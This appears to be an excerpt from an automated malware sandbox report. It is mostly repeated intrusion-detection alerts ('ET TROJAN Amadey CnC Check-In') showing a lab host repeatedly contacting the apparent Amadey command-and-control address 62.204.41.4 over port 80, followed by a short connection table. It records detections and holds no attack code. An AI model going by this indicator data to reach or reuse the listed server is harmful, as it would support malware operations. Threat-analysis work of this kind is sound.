                          192.168.2.662.204.41.450466802027700 02/07/23-20:04:15.238349TCP2027700ET TROJAN Amadey CnC Check-In5046680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450164802027700 02/07/23-20:02:58.984888TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450377802027700 02/07/23-20:03:53.490589TCP2027700ET TROJAN Amadey CnC Check-In5037780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450123802027700 02/07/23-20:02:45.637795TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450308802027700 02/07/23-20:03:36.533930TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450336802027700 02/07/23-20:03:43.422466TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450206802027700 02/07/23-20:03:08.986816TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450438802027700 02/07/23-20:04:08.447686TCP2027700ET TROJAN Amadey CnC Check-In5043880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449819802027700 02/07/23-20:01:17.050746TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449920802027700 02/07/23-20:01:44.690559TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449831802027700 02/07/23-20:01:19.998060TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450450802027700 02/07/23-20:04:11.381589TCP2027700ET TROJAN Amadey CnC Check-In5045080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449961802027700 02/07/23-20:01:57.956540TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449914802027700 02/07/23-20:01:42.801957TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450116802027700 02/07/23-20:02:43.899561TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450468802027700 02/07/23-20:04:15.743631TCP2027700ET TROJAN Amadey CnC Check-In5046880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449849802027700 02/07/23-20:01:24.342359TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449754802027700 02/07/23-20:00:59.616651TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450407802027700 02/07/23-20:04:00.848990TCP2027700ET TROJAN Amadey CnC Check-In5040780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449950802027700 02/07/23-20:01:55.313521TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450101802027700 02/07/23-20:02:40.156173TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450257802027700 02/07/23-20:03:21.461331TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450373802027700 02/07/23-20:03:52.533129TCP2027700ET TROJAN Amadey CnC Check-In5037380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450021802027700 02/07/23-20:02:16.175026TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450079802027700 02/07/23-20:02:34.128936TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449867802027700 02/07/23-20:01:31.342486TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450195802027700 02/07/23-20:03:06.319605TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449904802027700 02/07/23-20:01:40.346551TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450229802027700 02/07/23-20:03:14.593388TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450391802027700 02/07/23-20:03:56.919310TCP2027700ET TROJAN Amadey CnC Check-In5039180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449782802027700 02/07/23-20:01:06.291221TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450312802027700 02/07/23-20:03:37.521186TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449960802027700 02/07/23-20:01:57.722505TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449885802027700 02/07/23-20:01:35.593496TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450330802027700 02/07/23-20:03:41.942562TCP2027700ET TROJAN Amadey CnC Check-In5033080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449983802027700 02/07/23-20:02:03.190207TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450134802027700 02/07/23-20:02:51.667516TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450190802027700 02/07/23-20:03:05.082669TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450285802027700 02/07/23-20:03:30.859758TCP2027700ET TROJAN Amadey CnC Check-In5028580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449922802027700 02/07/23-20:01:45.348252TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450126802027700 02/07/23-20:02:46.754869TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449726802027700 02/07/23-20:00:52.825969TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449839802027700 02/07/23-20:01:21.949196TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450089802027700 02/07/23-20:02:37.027588TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450167802027700 02/07/23-20:02:59.715669TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450322802027700 02/07/23-20:03:39.988883TCP2027700ET TROJAN Amadey CnC Check-In5032280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449744802027700 02/07/23-20:00:57.142500TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450363802027700 02/07/23-20:03:50.032689TCP2027700ET TROJAN Amadey CnC Check-In5036380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450345802027700 02/07/23-20:03:45.626091TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449940802027700 02/07/23-20:01:52.794804TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450304802027700 02/07/23-20:03:35.546383TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450340802027700 02/07/23-20:03:44.394522TCP2027700ET TROJAN Amadey CnC Check-In5034080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450185802027700 02/07/23-20:03:03.865291TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449721802027700 02/07/23-20:00:51.504071TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450144802027700 02/07/23-20:02:54.112124TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450476802027700 02/07/23-20:04:17.709098TCP2027700ET TROJAN Amadey CnC Check-In5047680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450435802027700 02/07/23-20:04:07.721879TCP2027700ET TROJAN Amadey CnC Check-In5043580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450239802027700 02/07/23-20:03:17.051311TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450180802027700 02/07/23-20:03:02.871686TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449792802027700 02/07/23-20:01:10.777922TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450381802027700 02/07/23-20:03:54.458167TCP2027700ET TROJAN Amadey CnC Check-In5038180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449816802027700 02/07/23-20:01:16.328216TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449970802027700 02/07/23-20:02:00.209993TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450458802027700 02/07/23-20:04:13.302774TCP2027700ET TROJAN Amadey CnC Check-In5045880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449857802027700 02/07/23-20:01:28.881945TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450162802027700 02/07/23-20:02:58.501955TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450417802027700 02/07/23-20:04:03.329321TCP2027700ET TROJAN Amadey CnC Check-In5041780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450335802027700 02/07/23-20:03:43.169376TCP2027700ET TROJAN Amadey CnC Check-In5033580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449973802027700 02/07/23-20:02:00.704664TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450298802027700 02/07/23-20:03:34.067174TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450295802027700 02/07/23-20:03:33.354558TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450038802027700 02/07/23-20:02:20.336644TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450154802027700 02/07/23-20:02:56.574090TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449887802027700 02/07/23-20:01:36.097176TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449762802027700 02/07/23-20:01:01.308698TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450090802027700 02/07/23-20:02:37.310665TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450332802027700 02/07/23-20:03:42.434857TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449930802027700 02/07/23-20:01:50.374173TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450267802027700 02/07/23-20:03:26.438067TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450409802027700 02/07/23-20:04:01.334892TCP2027700ET TROJAN Amadey CnC Check-In5040980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450448802027700 02/07/23-20:04:10.888532TCP2027700ET TROJAN Amadey CnC Check-In5044880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449826802027700 02/07/23-20:01:18.795280TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449945802027700 02/07/23-20:01:54.040738TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450157802027700 02/07/23-20:02:57.285145TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449752802027700 02/07/23-20:00:59.119449TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450111802027700 02/07/23-20:02:42.651134TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450371802027700 02/07/23-20:03:52.056353TCP2027700ET TROJAN Amadey CnC Check-In5037180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449829802027700 02/07/23-20:01:19.514063TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450445802027700 02/07/23-20:04:10.137178TCP2027700ET TROJAN Amadey CnC Check-In5044580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450259802027700 02/07/23-20:03:22.267663TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450478802027700 02/07/23-20:04:18.186763TCP2027700ET TROJAN Amadey CnC Check-In5047880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449790802027700 02/07/23-20:01:10.237146TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450129802027700 02/07/23-20:02:48.528501TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450152802027700 02/07/23-20:02:56.096465TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450193802027700 02/07/23-20:03:05.833351TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449741802027700 02/07/23-20:00:56.423673TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450437802027700 02/07/23-20:04:08.206570TCP2027700ET TROJAN Amadey CnC Check-In5043780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449818802027700 02/07/23-20:01:16.810089TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449902802027700 02/07/23-20:01:39.857998TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450011802027700 02/07/23-20:02:13.661822TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449859802027700 02/07/23-20:01:29.375750TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450230802027700 02/07/23-20:03:14.875718TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450360802027700 02/07/23-20:03:49.278758TCP2027700ET TROJAN Amadey CnC Check-In5036080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449724802027700 02/07/23-20:00:52.311391TCP2027700ET TROJAN Amadey CnC Check-In4972480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450052802027700 02/07/23-20:02:23.740043TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450343802027700 02/07/23-20:03:45.134037TCP2027700ET TROJAN Amadey CnC Check-In5034380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450182802027700 02/07/23-20:03:03.137173TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449795802027700 02/07/23-20:01:11.503277TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450124802027700 02/07/23-20:02:45.914007TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449854802027700 02/07/23-20:01:26.635794TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450307802027700 02/07/23-20:03:36.268284TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449895802027700 02/07/23-20:01:38.089700TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449932802027700 02/07/23-20:01:50.862632TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450302802027700 02/07/23-20:03:35.050150TCP2027700ET TROJAN Amadey CnC Check-In5030280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450473802027700 02/07/23-20:04:16.958101TCP2027700ET TROJAN Amadey CnC Check-In5047380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449846802027700 02/07/23-20:01:23.606581TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450465802027700 02/07/23-20:04:14.989652TCP2027700ET TROJAN Amadey CnC Check-In5046580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450070802027700 02/07/23-20:02:31.982508TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449935802027700 02/07/23-20:01:51.579500TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450076802027700 02/07/23-20:02:33.409323TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450165802027700 02/07/23-20:02:59.233846TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450376802027700 02/07/23-20:03:53.252674TCP2027700ET TROJAN Amadey CnC Check-In5037680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449892802027700 02/07/23-20:01:37.344208TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449953802027700 02/07/23-20:01:56.032155TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449757802027700 02/07/23-20:01:00.338641TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449981802027700 02/07/23-20:02:02.719021TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450137802027700 02/07/23-20:02:52.411572TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450131802027700 02/07/23-20:02:50.831579TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449864802027700 02/07/23-20:01:30.634611TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449907802027700 02/07/23-20:01:41.092787TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450042802027700 02/07/23-20:02:21.298484TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450198802027700 02/07/23-20:03:07.083063TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450048802027700 02/07/23-20:02:22.753627TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449775802027700 02/07/23-20:01:04.516285TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450287802027700 02/07/23-20:03:31.342737TCP2027700ET TROJAN Amadey CnC Check-In5028780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450220802027700 02/07/23-20:03:12.442628TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450315802027700 02/07/23-20:03:38.266612TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450226802027700 02/07/23-20:03:13.874522TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450394802027700 02/07/23-20:03:57.671451TCP2027700ET TROJAN Amadey CnC Check-In5039480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450119802027700 02/07/23-20:02:44.644394TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450208802027700 02/07/23-20:03:09.500907TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450404802027700 02/07/23-20:04:00.112465TCP2027700ET TROJAN Amadey CnC Check-In5040480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450060802027700 02/07/23-20:02:26.448814TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450103802027700 02/07/23-20:02:40.685701TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450109802027700 02/07/23-20:02:42.172519TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449969802027700 02/07/23-20:01:59.969581TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450080802027700 02/07/23-20:02:34.379327TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449874802027700 02/07/23-20:01:33.109253TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449963802027700 02/07/23-20:01:58.504584TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449785802027700 02/07/23-20:01:07.828926TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450210802027700 02/07/23-20:03:09.990259TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450032802027700 02/07/23-20:02:18.890388TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450014802027700 02/07/23-20:02:14.441730TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450121802027700 02/07/23-20:02:45.141107TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450338802027700 02/07/23-20:03:43.908584TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450427802027700 02/07/23-20:04:05.737324TCP2027700ET TROJAN Amadey CnC Check-In5042780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449823802027700 02/07/23-20:01:18.077794TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449808802027700 02/07/23-20:01:14.637798TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449820802027700 02/07/23-20:01:17.299894TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449979802027700 02/07/23-20:02:02.207618TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449731802027700 02/07/23-20:00:54.023441TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449912802027700 02/07/23-20:01:42.328220TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449994802027700 02/07/23-20:02:09.136024TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450264802027700 02/07/23-20:03:25.691639TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450353802027700 02/07/23-20:03:47.599615TCP2027700ET TROJAN Amadey CnC Check-In5035380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449734802027700 02/07/23-20:00:54.737090TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450001802027700 02/07/23-20:02:11.159823TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450350802027700 02/07/23-20:03:46.848980TCP2027700ET TROJAN Amadey CnC Check-In5035080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450172802027700 02/07/23-20:03:00.921461TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450261802027700 02/07/23-20:03:23.514341TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450442802027700 02/07/23-20:04:09.409561TCP2027700ET TROJAN Amadey CnC Check-In5044280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450083802027700 02/07/23-20:02:35.239474TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450086802027700 02/07/23-20:02:36.208344TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450004802027700 02/07/23-20:02:11.893867TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450175802027700 02/07/23-20:03:01.662459TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450249802027700 02/07/23-20:03:19.487023TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449925802027700 02/07/23-20:01:47.192101TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450414802027700 02/07/23-20:04:02.595462TCP2027700ET TROJAN Amadey CnC Check-In5041480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450325802027700 02/07/23-20:03:40.711953TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450455802027700 02/07/23-20:04:12.584652TCP2027700ET TROJAN Amadey CnC Check-In5045580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449747802027700 02/07/23-20:00:57.887103TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449966802027700 02/07/23-20:01:59.250311TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449877802027700 02/07/23-20:01:33.832947TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449836802027700 02/07/23-20:01:21.202537TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449772802027700 02/07/23-20:01:03.779261TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449788802027700 02/07/23-20:01:09.765672TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449991802027700 02/07/23-20:02:05.764041TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449861802027700 02/07/23-20:01:29.882532TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450058802027700 02/07/23-20:02:25.697906TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450236802027700 02/07/23-20:03:16.324345TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450017802027700 02/07/23-20:02:15.190910TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450366802027700 02/07/23-20:03:50.757393TCP2027700ET TROJAN Amadey CnC Check-In5036680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450099802027700 02/07/23-20:02:39.663652TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450147802027700 02/07/23-20:02:54.873680TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450188802027700 02/07/23-20:03:04.590702TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450277802027700 02/07/23-20:03:28.892621TCP2027700ET TROJAN Amadey CnC Check-In5027780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450106802027700 02/07/23-20:02:41.451184TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.662.204.41.4
                          TimestampSource PortDest PortSource IPDest IP
                          Feb 7, 2023 20:00:50.777110100 CET4971880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.777430058 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:50.836796045 CET804971862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:50.837024927 CET4971880192.168.2.662.204.41.4
